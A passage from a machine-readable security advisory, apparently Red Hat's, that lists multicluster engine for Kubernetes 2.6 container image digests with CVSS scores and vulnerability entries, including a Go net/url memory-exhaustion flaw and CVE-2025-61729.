2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"}, {"cve": "CVE-2025-61729", "cwe": {"id": "CWE-1050", "name": "Excessive Platform Resource Consumption within a Loop"}, "discovery_date": "2025-12-02T20:01:45.330964+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 